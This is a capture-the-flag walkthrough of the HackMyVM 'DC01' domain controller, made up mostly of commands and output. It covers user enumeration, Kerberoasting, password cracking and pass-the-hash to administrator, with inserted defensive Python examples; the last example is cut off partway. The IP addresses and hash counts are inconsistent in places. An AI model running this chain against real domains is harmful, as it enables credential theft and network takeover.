DC01 – HackMyVM

  • OS: Windows
  • Difficulty: Easy
  • Platform: HackMyVM


Summary

“DC01” is an easy machine from the HackMyVM platform that introduces some Active Directory concepts. We are allowed to enumerate users as the guest account. We can then use the GetUserSPNs tool from Impacket to obtain Kerberos hashes for some users and crack them. We thereby obtain the password for one user that has read access to a backup share. This share contains NTLM hashes for some accounts. One of them still works for a machine account, and this final account has maximum privileges on the target machine, which allows us to gain total control of it.


User

An initial Nmap scan shows multiple open ports: 53 Domain Name System (DNS), 88 Kerberos, 135 Microsoft RPC, 389 Lightweight Directory Access Protocol (LDAP), 445 Server Message Block (SMB), 5985 Windows Remote Management (WinRM), among many others:

❯ sudo nmap -sS -p- --open --min-rate=5000 -n -Pn -vvv 10.20.1.140

Running service and script detection (the -sVC flags) against these ports shows:

❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49670,49677,49694 10.20.1.140

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 20:23 -03
Nmap scan report for 1.20.1.140
Host is up (0.00052s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-18 03:23:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:43:08:EC (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-10-18T03:24:23
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:43:08:ec (Oracle VirtualBox virtual NIC)
|_clock-skew: 3h59m58s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.40 seconds

We are up against an Active Directory environment.

Using NetExec against the SMB service reveals the domain:

❯ nxc smb 10.20.1.140

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)

We have a domain: SOUPEDECODE.LOCAL.

We are allowed to log in as the guest user:

❯ nxc smb 10.20.1.140 -u 'guest' -p ''

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\guest:

We are also not able to read any interesting shares (listed with the --shares flag):

❯ nxc smb 1.20.1.140 -u 'guest' -p '' --shares

SMB         1.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         1.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         1.20.1.140     445    DC01             [*] Enumerated shares
SMB         1.20.1.140     445    DC01             Share           Permissions     Remark
SMB         1.20.1.140     445    DC01             -----           -----------     ------
SMB         1.20.1.140     445    DC01             ADMIN$                          Remote Admin
SMB         1.20.1.140     445    DC01             backup
SMB         1.20.1.140     445    DC01             C$                              Default share
SMB         1.20.1.140     445    DC01             IPC$            READ            Remote IPC
SMB         1.20.1.140     445    DC01             NETLOGON                        Logon server share
SMB         1.20.1.140     445    DC01             SYSVOL                          Logon server share
SMB         1.20.1.140     445    DC01             Users

There is a backup share, but we are not able to read it as guest.

If we use --rid-brute to enumerate users through the guest session, we get results:

❯ nxc smb 1.20.1.140 -u 'guest' -p '' --rid-brute

SMB         1.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         1.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         1.20.1.140     445    DC01             498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         1.20.1.140     445    DC01             500: SOUPEDECODE\Administrator (SidTypeUser)
SMB         1.20.1.140     445    DC01             501: SOUPEDECODE\Guest (SidTypeUser)
SMB         1.20.1.140     445    DC01             502: SOUPEDECODE\krbtgt (SidTypeUser)
<SNIP>
SMB         1.20.1.140     445    DC01             2162: SOUPEDECODE\PC-90$ (SidTypeUser)
SMB         1.20.1.140     445    DC01             2163: SOUPEDECODE\firewall_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2164: SOUPEDECODE\backup_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2165: SOUPEDECODE\web_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2166: SOUPEDECODE\monitoring_svc (SidTypeUser)
SMB         1.20.1.140     445    DC01             2168: SOUPEDECODE\admin (SidTypeUser)

After filtering the output with grep (dropping groups and the built-in accounts), we can save the potential users with:

❯ nxc smb 1.20.1.140 -u 'guest' -p '' --rid-brute | awk '{print $6}' | grep 'SOUPEDECODE' | grep -vE 'Enterprise|Domain|Schema|Group|Read-only|Cloneable|Cert|Key|RAS|Protected|Allowed|Denied|DnsAdmins|DnsUpdateProxy|guest:' | awk -F '\' '{print $2}' > potential_users.txt

Since we were able to enumerate users with NetExec as the guest user and obtained a list of potential users, I will check whether we can request Kerberos service-ticket hashes for these users with GetUserSPNs.py from Impacket:

❯ impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users.txt

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

We get a KRB_AP_ERR_SKEW error: the Nmap output already reported a clock skew of 3h59m58s, and Kerberos rejects requests whose timestamp differs from the DC's time by more than the allowed skew (5 minutes by default).

To avoid this error we can run sudo ntpdate -s 10.20.1.140 right before the command, which syncs our clock to the DC. Additionally, since the list is too big I will split it in two using sed. The user file is 1069 lines long, so we first delete lines 600 to 1069:

❯ sed '600,1069d' potential_users.txt > potential_users_part1.txt

and then delete the first 599 lines by running sed again:

❯ sed '1,599d' potential_users.txt > potential_users_part2.txt

Then, we can request the hashes running:

❯ sudo ntpdate -s 10.20.1.140 && impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users_part1.txt -outputfile hashes_found1

<SNIP>

❯ sudo ntpdate -s 10.20.1.140 && impacket-GetUserSPNs SOUPEDECODE.LOCAL/guest -no-pass -dc-ip 10.20.1.140 -usersfile potential_users_part2.txt -outputfile hashes_found2

Append both results into one file using cat:

❯ cat hashes_found2 >> hashes_found1

and we have 5 hashes for 5 different users:

❯ cat hashes_found1 | grep -vE 'PC\$|PC-'

$krb5tgs$18$krbtgt$SOUPEDECODE.LOCAL$*krbtgt*$4ecd7ed4b5252754de6b967d$d1a00b576eedfa102b4650a56a55e0be9b90df0e3c3bb1d8565a5c38b3103d6a96fdf67d5afb98210b5789ce6ce137beea723d9fdee227e169e2720e8322d3f3b9c01828aae3d9184fd309bd6c08ff3479a9d4754a636d8bdb38729031ed50529b2cc1a6f8c0e9dc08b6cca2477bbead25a82425d7153fee9c46b92047aa1617b45c37fd4d40130663fc6363218f1f806a7a6ebcab0a0974bd6dc9e4ded6dd25abe2286aaec7dafda6e77981470138dac7c8e25d18d4c24578b0275c6039bd95a000bad7f4d01d92c385cfb5cf75d06afa36a0fa0a06de7b5bc2aba9d576de44482037f958dcf7643da5278a2a74900a39ec2629b8fab1e5301b8103f25ce2f0805a5b21fb99e49058219e97c5d32784253277bf978a61bc392e08c7fddab9d5004400bc264aa67aa446ba186f7d74c7e28872e881bf6b6dbd6671e973e588c3aef5ab8a2a54b51cf22f72fb2b787757aa975bc1f13c53c45ca6e72bd6d0f69a1c24ae445daef205bd676ad56f56a7598ad41024caefab2f274b6eaabf47680542bf0a8408c05fc7c08bcb6f06b413b598c053d5485f1443226486ccd4524a06f4550cd25ad869e6a03ea89a5823b577c91de6e43975c86898618a60cdd0270ca868deb92fcbcb6d26f0a081c8174c8a00181933eb86cce901f3103efe9de62639cab715729c935396ab8e51df592192aa24fc22843571ec8ed6e473a991f01bbba8503970675350ff4c8365a371894e3b35c025ecc1834d3e7f7d66e452478c265d79c1a037066089f157deb60e9929440249b0614ea6b72933c4c8213a870661a14cdfb08f4e6544d4c7393188cc030a7a8b920968e8a3ba70c99c97b607e8b90eb39454dc0b832866623b8b29e663c55aa307690117c5661fdf583955e734f43818f54070792a6cc7d4de9be7728c8fee3e40308bbc21e08b2a85fdacaf040e79f54f8118c726d5de2e0d800d2daaa69dd08bb1a558214f77cd901db13728921e9e22f46b9bd52682b4601439b0733e72b4ed637f45d5bd5413828d630a2d8380d021dc3863768db46be1122c1454f5f25542c0ed349c5d42269684aef0864012d31c29ea4ff8f4cd82f10fb6416f93f16a5f631153496077d044b5d8ecca61c37cecdcea245280adb5822ef5b366534311ffd11e37f47a973d555824d93ba04832d21de560ec16df8e2fb3e913703982154e81e1c4a57d8f54d6f7d47ad47fe3bf4f16e4a751d0c5f23377b558b33ce9b857c46ba6f8c426778f45dfa03a3ad5541451ee5418487af853f9e93e39f5edecbd29805edf74558eaee2fd6fccb9b89f0666a0500d4792effa68a24679295b656233a14633305be94146632eb53cc392ca1
61053d9c142d388c540d4c10a52768fe60900567656df96812eba72bef3c8bd92d40e138eff49544c7d07e93bc946e17610b39f90e30cb220c9e8b6188587b76906eb4c0b82dde0341127067a12da22ef5787247f0cf1805007577bbd14427327db97
$krb5tgs$18$DC01$$SOUPEDECODE.LOCAL$*DC01$*$bf907a7ce2b3ef5e3e4a7cfd$<SNIP>
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$file_svc*$73c009074156218414b4d20086bc2e38$53b4c659dac28bcd45263758813a4ac78a88190f35b5ea437e74aff3fe36fcdc8e916e30034214ff3fdbd5c92edf3eaeffec2e6337c585b72ae4d579a9c71da0142a04fe3747885a9f5316043030ca67e3c5788dcfa1ccb1cdd7eb345d2286676fee78588650aef8ec9fad25ab200e5ea850bafcf85e964513faddaa3fe5290cc2f96a2814b128e7a5455471dd95ad790a004f718fd551c2efa12e0fe38b1bdd626a08903ebba8cec1eaeb9dc3dfea1840a352875c0e8b0147f7df6f0d11fbec2d3de81c9b1a2784ee430bef5c034d37c603458f3806a44848351f4527983958afff11364f872039ac0c13d5fb9ed7c0284dbf5d53b557c2dd9c721dcdebf23a23a4115d6d76432a26ea0ffa38675375f6cda431fceaf5147109d9554c2217985e0411c5524a46417c6b03ecb3c041458d877bc6f2bbf5fb22007b0bce454d74ce181c21e376366fa4ade935ec36e11286538b9e15e4f383c15dce3bc251b336c04ae80e037d500cb4faebdec38249254011e6343a2fb87e55302a16d3b98b2e01b41f88628fe49e9b77ec55b6f62bd116e9061449400c7b5892da1af4d90c32b9c92e1104911c2f3425372729855cbdbb042b08da4843605bc2a8bf3ee95e3508e46a41c9777060c8d594bdcdc2abe37dbf05cae6128d7709c3b643c1f7432b3ae75e5d00bbc03216c9427851da6a66a8494f0c28bf82e19faaddef770aca0ffc0e2e6d89d6764089956c412a3d1707272b67557387dbdb71a5e8ddc0af6a7ddfe56e49f71b9c2bbc718ecf5a7bfdd7dd3e1074e49d6ad4962e19a0a1042cfb3ea35a335f1303d33191170e40d2132d0d3b2f50127a71ecb8ff06393f49799c950f074c94a74df665b58f194a61492520ba341507790087cd9d9402f4d72b30cd8da5024b4a88dc4ebe4e5d6b6f05d573aa3b1010ef27fe35ca739a8660053a88df878a76124a97bcc855672ae6b3ab943d79c694eb91f9137104886b734e3f77bb9bb8dabd2621c1c0a477d58717ea144a719cd7c66aacae4df9de35f0516d8f0141ed9c4cf6ff88c7345c47c180e7d662999371fce22745b5c3b9384bf2040672bcff4fb6ceb3cf32a8a26c7635e5568c727b8bc52089562cb8e8fab20ed2b4c98cd9afb46a693df24fe0eae7a500a34c97bdc9b8f73408fe50984a36ce072657aac8840287199fa4d1819dd6ee691106306d1a4418c72d5e8c26c3d476c74c8e3cdcffb11693c011c4d95ba57ffa6e1a8e594170719f142f65c15beb4ac9bf2f377de7c6cf36bba2b0593594323f18913d340bfba8070e72eef637d3dc861f63e4fa385df18a3f0240973d46b960aaabd18e4316955099884a83b6728
9c20385d78d0cb7933d2f3d486c0d0736f139e08e57831fdd0b43efe88abfc676583cab1a4b1f9566f1027a6d543d086d4d927bf632ad34d2dc5d924ed1abb26e
<SNIP>

I filter the hashes, excluding those for the PC machine accounts:

❯ cat hashes_found1 | grep -vE 'PC\$|PC-' > filtered_hashes

and attempt to crack them with a dictionary attack, using the rockyou.txt wordlist and John the Ripper:

❯ john --wordlist=/usr/share/wordlists/rockyou.txt filtered_hashes

Using default input encoding: UTF-8
Loaded 15 password hashes with 15 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123!!    (?)
1g 0:00:01:07 DONE (2024-10-17 21:40) 0.01480g/s 212311p/s 3131Kc/s 3131KC/s  0841079575..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We get a password: Password123!!.

The password is for one of these users:

❯ cat filtered_hashes | awk -F '$' '{print $4}' | tr -d '*'

krbtgt
DC01
file_svc
WebServer
DatabaseServer
FileServer
MailServer
BackupServer
ApplicationServer
PrintServer
ProxyServer
MonitoringServer
CitrixServer
firewall_svc
backup_svc
web_svc
monitoring_svc

So we save them:

❯ cat filtered_hashes | awk -F '$' '{print $4}' | tr -d '*' > potential_hash_user.txt
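The awk pipeline above pulls the account name out of each $krb5tgs$ line by position. The following is an added example (not code from the writeup) that parses the same header fields properly, including machine accounts whose name ends in "$", and groups the hashes by Kerberos encryption type. The sample lines reuse the header fields of the hashes shown above; their long ticket blobs are replaced by short constructed placeholders, since the parser never reads them. It shows why john reported loading 15 hashes from a 17-line file: the krbtgt and DC01$ entries are etype 18 (AES), which the krb5tgs format the run picked up does not cover, while the etype 23 (RC4) entries are the ones a wordlist attack can test quickly.

```python
"""Parse Impacket-style $krb5tgs$ lines and group them by Kerberos encryption type.

Added example, not part of the original writeup. The header fields of the
sample lines are taken from the hashes shown above; the ticket blobs are
replaced by short constructed placeholders because the parser never reads them.
"""
import re
from collections import defaultdict

# RFC 3961 / RFC 4757 encryption type numbers.
ETYPE_NAMES = {
    17: "aes128-cts-hmac-sha1-96",
    18: "aes256-cts-hmac-sha1-96",
    23: "rc4-hmac",
}

# Impacket writes etype 23 as  $krb5tgs$23$*USER$REALM$SPN*$CHECKSUM$DATA
# and the AES etypes as       $krb5tgs$18$USER$REALM$*SPN*$CHECKSUM$DATA.
# Machine accounts end in '$', so the account name is matched lazily and the
# realm is required to look like an upper-case Kerberos realm.
HASH_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$"
    r"\*?(?P<user>.+?)\*?\$"
    r"(?P<realm>[A-Z0-9.-]+)\$"
    r"\*?(?P<spn>.+?)\*?\$"
    r"(?P<checksum>[0-9a-f]+)\$"
    r"(?P<data>[0-9a-f]+)$"
)

# Constructed sample input (see module docstring).
SAMPLE_HASHES = [
    "$krb5tgs$18$krbtgt$SOUPEDECODE.LOCAL$*krbtgt*$4ecd7ed4b5252754de6b967d$d1a00b57",
    "$krb5tgs$18$DC01$$SOUPEDECODE.LOCAL$*DC01$*$bf907a7ce2b3ef5e3e4a7cfd$0badf00d",
    "$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$file_svc*$73c009074156218414b4d20086bc2e38$53b4c659",
    "$krb5tgs$23$*WebServer$$SOUPEDECODE.LOCAL$WebServer$*$00112233445566778899aabbccddeeff$cafebabe",
]


def parse_krb5tgs(line):
    """Return the header fields of one $krb5tgs$ line, or None if it is malformed."""
    m = HASH_RE.match(line.strip())
    if not m:
        return None
    etype = int(m.group("etype"))
    checksum = m.group("checksum")
    # RC4-HMAC carries a 16-byte checksum, the AES etypes a 12-byte one.
    expected_len = 32 if etype == 23 else 24
    if len(checksum) != expected_len:
        return None
    return {
        "etype": etype,
        "etype_name": ETYPE_NAMES.get(etype, "unknown"),
        "user": m.group("user"),
        "realm": m.group("realm"),
        "spn": m.group("spn"),
        "is_machine_account": m.group("user").endswith("$"),
    }


def group_by_etype(lines):
    """Map each etype name to the sorted list of account names that use it."""
    groups = defaultdict(list)
    for line in lines:
        entry = parse_krb5tgs(line)
        if entry is not None:
            groups[entry["etype_name"]].append(entry["user"])
    return {name: sorted(users) for name, users in groups.items()}


def rc4_accounts(lines):
    """Accounts whose tickets were issued with RC4 (etype 23): the entries a
    wordlist run like the john command above can load and test quickly."""
    return [e["user"] for e in map(parse_krb5tgs, lines) if e and e["etype"] == 23]


if __name__ == "__main__":
    for name, users in group_by_etype(SAMPLE_HASHES).items():
        print(f"{name}: {', '.join(users)}")
```

From the defender's side the etype column is the actionable part: an RC4 ticket means the account still advertises RC4 support (msDS-SupportedEncryptionTypes), so restricting service accounts to AES, and giving them long random passwords or converting them to group Managed Service Accounts, is what turns a hash like file_svc's from crackable-in-a-minute into effectively uncrackable.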

We check whether this password works for one of these users with NetExec:

❯ nxc smb 10.20.1.140 -u potential_hash_user.txt -p 'Password123!!' --continue-on-success | grep -v 'Guest'

SMB                      10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\krbtgt:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\firewall_svc:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\backup_svc:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\web_svc:Password123!! STATUS_LOGON_FAILURE
SMB                      10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\monitoring_svc:Password123!! STATUS_LOGON_FAILURE

and we have the password for file_svc user.


NT Authority/System - Administrator

This user cannot log in via WinRM, but if we check which shares this user can read, we can see it has read access to the backup share over SMB:

❯ nxc smb 10.20.1.140 -u 'file_svc' -p 'Password123!!' --shares --filter-shares READ

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\file_svc:Password123!!
SMB         10.20.1.140     445    DC01             [*] Enumerated shares
SMB         10.20.1.140     445    DC01             Share           Permissions     Remark
SMB         10.20.1.140     445    DC01             -----           -----------     ------
SMB         10.20.1.140     445    DC01             backup          READ
SMB         10.20.1.140     445    DC01             IPC$            READ            Remote IPC
SMB         10.20.1.140     445    DC01             NETLOGON        READ            Logon server share
SMB         10.20.1.140     445    DC01             SYSVOL          READ            Logon server share

We then use smbmap to list the contents of this share:

❯ smbmap -H 10.20.1.140 -u 'file_svc' -p 'Password123!!' -r 'backup' --no-banner

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 10.20.1.140:445 Name: 10.20.1.140               Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        backup                                                  READ ONLY
        ./backup
        dr--r--r--                0 Mon Jun 17 13:41:17 2024    .
        dw--w--w--                0 Mon Jun 17 13:44:56 2024    ..
        fr--r--r--              892 Mon Jun 17 13:41:23 2024    backup_extract.txt
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share
        Users                                                   NO ACCESS
[*] Closed 1 connections

We have a file named backup_extract.txt.

We download this file with smbmap and the --download flag:

❯ smbmap -H 10.20.1.140 -u 'file_svc' -p 'Password123!!' --download 'backup/backup_extract.txt' --no-banner

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: backup\backup_extract.txt (892 bytes)
[+] File output to: /home/gunzf0x/OtherMachines/HackMyVM/DC01/content/10.20.1.140-backup_backup_extract.txt
[*] Closed 1 connections

Its contents are a series of NTLM hashes in pwdump format (account, RID, LM hash, NT hash), all of them for machine accounts:

❯ cat 10.20.1.140-backup_backup_extract.txt

WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
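Before doing anything with a dump like this, it is worth reading it as a defender would. The following is an added example (not code from the writeup) that parses the pwdump lines above and flags the hygiene problems visible in them: NT hashes shared by more than one account, entries that still store an LM hash, and accounts with an empty password. The sample input is the backup_extract.txt content shown above plus one constructed line (legacy_svc, an invented name) added to exercise the LM and empty-NT checks.

```python
"""Audit a pwdump-style hash dump for password hygiene problems.

Added example, not part of the original writeup. SAMPLE_DUMP holds the lines of
backup_extract.txt shown above plus one constructed entry (legacy_svc) that has
a stored LM hash and an empty NT password.
"""
from collections import defaultdict

# Well-known constants: the LM hash of an empty password (what Windows stores
# when LM hashing is disabled) and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

SAMPLE_DUMP = """\
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
legacy_svc:1337:0123456789abcdef0123456789abcdef:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def _is_hex32(value):
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value.lower())


def parse_pwdump(text):
    """Parse 'user:rid:lm:nt:::' lines; malformed lines are skipped."""
    entries = []
    for raw in text.splitlines():
        fields = raw.strip().split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            continue
        user, rid, lm, nt = fields[0], int(fields[1]), fields[2].lower(), fields[3].lower()
        if not (_is_hex32(lm) and _is_hex32(nt)):
            continue
        entries.append({"user": user, "rid": rid, "lm": lm, "nt": nt})
    return entries


def find_reused_nt(entries):
    """NT hashes that appear under more than one account (same password reused)."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {nt: sorted(users) for nt, users in by_nt.items() if len(users) > 1}


def audit_dump(text):
    """Summarise the hygiene findings for a dump."""
    entries = parse_pwdump(text)
    return {
        "reused_nt": find_reused_nt(entries),
        "lm_hash_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "empty_nt": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "machine_accounts": sum(1 for e in entries if e["user"].endswith("$")),
    }


if __name__ == "__main__":
    for key, value in audit_dump(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

Two pairs of machine accounts (MailServer$/BackupServer$ and CitrixServer$/MonitoringServer$) share an NT hash, which cannot happen with the random passwords domain members generate for themselves; together with the fact that a hash from a June backup still authenticates in October (domain computers rotate their password every 30 days by default), it shows these accounts were created with hand-set passwords that never rotate. The exposure that matters here is the file itself sitting on a share a low-privilege service account can read.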

Since we already have a list of users, we can attempt a Pass-the-Hash attack with these hashes, as one of them might still work. Save the NT hashes:

❯ cat 10.20.1.140-backup_backup_extract.txt | awk -F : '{print $4}'

c47b45f5d4df5a494bd19f13e14f7902
406b424c7b483a42458bf6f545c936f7
48fc7eca9af236d7849273990f6c5117
e41da7e79a4c76dbd9cf79d1cb325559
46a4655f18def136b3bfab7b0b4e70e3
46a4655f18def136b3bfab7b0b4e70e3
8cd90ac6cba6dde9d8038b068c17e9f5
b8a38c432ac59ed00b2a373f4f050d28
4e3f0bb3e5b6e3e662611b1a87988881
48fc7eca9af236d7849273990f6c5117

❯ cat 10.20.1.140-backup_backup_extract.txt | awk -F : '{print $4}' > leaked_hashes

Then use NetExec again with the leaked hashes to see whether any of them works for one of the users enumerated earlier:

❯ nxc smb 10.20.1.140 -u potential_users.txt -H leaked_hashes

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\Administrator:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\Guest:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\krbtgt:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
<SNIP>
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\WebServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [-] SOUPEDECODE.LOCAL\DatabaseServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)

This worked for the FileServer$ account. Additionally, NetExec prints the Pwn3d! message for the SMB service, which means the FileServer$ account has maximum (administrative) privileges on the machine.
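Both NetExec runs above (the password spray with Password123!! and the hash spray with the leaked NT hashes) have the same shape from the DC's point of view: one source address failing against many distinct accounts within a couple of seconds and then succeeding as one of them. The following is an added example (not code from the writeup) of the detection logic a defender would run over authentication records to catch that pattern. The records are constructed to mirror the two runs plus one benign user mistyping a password, and use a simplified (timestamp, source, account, outcome) tuple rather than a real Windows event log format; the source address 10.20.1.50 and the user alice are invented.

```python
"""Flag password/hash spraying from authentication records.

Added example, not part of the original writeup. It models what the DC sees
during the two NetExec runs above: one source failing against many distinct
accounts inside a short window, then succeeding as one of them. Records are
constructed and use a simplified (timestamp, source, account, outcome) shape.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # Constructed: the password spray ('Password123!!' against the user list).
    ("2024-10-17T21:45:00", "10.20.1.50", "krbtgt", "FAIL"),
    ("2024-10-17T21:45:00", "10.20.1.50", "file_svc", "OK"),
    ("2024-10-17T21:45:01", "10.20.1.50", "firewall_svc", "FAIL"),
    ("2024-10-17T21:45:01", "10.20.1.50", "backup_svc", "FAIL"),
    ("2024-10-17T21:45:02", "10.20.1.50", "web_svc", "FAIL"),
    ("2024-10-17T21:45:02", "10.20.1.50", "monitoring_svc", "FAIL"),
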